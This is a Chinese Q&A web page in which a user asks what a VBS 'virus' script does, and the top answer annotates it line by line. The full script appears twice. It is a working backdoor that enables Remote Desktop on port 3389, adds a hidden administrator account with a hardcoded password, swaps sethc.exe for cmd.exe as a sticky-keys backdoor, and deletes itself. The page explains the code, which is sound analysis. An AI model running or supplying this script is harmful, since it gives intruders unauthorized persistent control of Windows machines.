解释一个VBS脚本病毒代码

如下所示：
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

帮忙吧！我分只剩下五了，都给你了！跪求！！

举报该问题

推荐答案推荐于2016-08-02

'容错
on error resume next
'定义一个常量是一个注册表的键值
const HKEY_LOCAL_MACHINE = &H80000002
'定义一个变量strComputer 值为.
strComputer = "."

Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
'创建组件是关于注册表的组件

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

'上面这段的功能是开启3389端口也就是开启远程终端方法是修改注册表的键值
'容错
on error resume next
'定义变量 username password
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
'这段是增加管理员用户名是HackEr 密码是393214425
'容错
On Error Resume Next

Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F? %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe? %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
'这段是留后门放大镜后门将sethc.exe替换为cmd.exe 这样在登陆界面这里按5下shift就会出现cmd窗口然后添加用户即可登陆系统

总结这个不算是病毒充其量只不过是一个后门程序运行之后系统的远程终端开启，自动加入一个HackEr的帐号自动添加一个放大镜后门
个人感觉这代码是将3段代码拼凑起来的 - - 没技术含量

温馨提示：答案为网友推荐，仅供参考

当前网址：http://55.wendadaohang.com/zd/IQeeRLF8G.html

其他回答

第1个回答 2010-05-16

有一段的解释是：要修改管理员用户的名字与权限，还有就是要生成些病毒编写者的其他自己编写的文件，还有就是系统路径的修改的问题，还有就是管理员用户的系统的终端的修改，创建有病毒编写者的自己的键值。

第2个回答 2010-05-17

是一个蠕虫代码
不好解释
编程必学
太深奥…………………………………………………………………………………………………………………………………………………………………………………………………………

相似回答

谁能解释下面简单的电脑病毒代码?答：这是一段vbs代码：直到(除非)1等于2，否则就一直弹出一个写有"烦死你"的窗口，因为1永远不等于2，所以不断的弹窗。这是VB的一个简单编程，但是代码却不怀好意。这段代码的意思是说，当双击运行这个程序的时候，执行以下代码：直到(除非)1等于2，否则隐藏这个软件的窗体，然后显示这个软件的窗体，然...

VBS脚本病毒的病毒原理分析答：VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而宏病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面...

我去打印房打印,u盘上中了这个.vbs的病毒,用记事本打开全是乱码,求解...答：for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next 由于VBS与JS一样是解释型语言，代码自上而下，一行一行地运行。所以解这类代码的一个技巧是：我们寻找解密入口点时，应该优先考虑最后一个execute。作者大量使用逻辑拼接。。。属于很BT的加密。。。汗水......

c盘里有一个VBS文件,双击后就会产生一个脚本病毒的文件答：q)set w=createobject("adodb.stream")with w .mode=3 .type=1 .open().write t .savetofile "c:\nkluxar.vbs",2 end with wscript.quit end if wscript.sleep(200)loop 这段代码好像是一个保护和传播病毒的主体文件，它的另一个文件c:\dfdtpz.vbs，已经被你杀毒软件杀掉了吧！

VBS病毒代码视频时间 01:18

大家正在搜

脚本病毒怎么解决黑客病毒代码弹窗病毒代码计算机病毒代码红色代码病毒简单的电脑病毒代码简单的病毒编程代码病毒编程代码被称为电脑病毒制作代码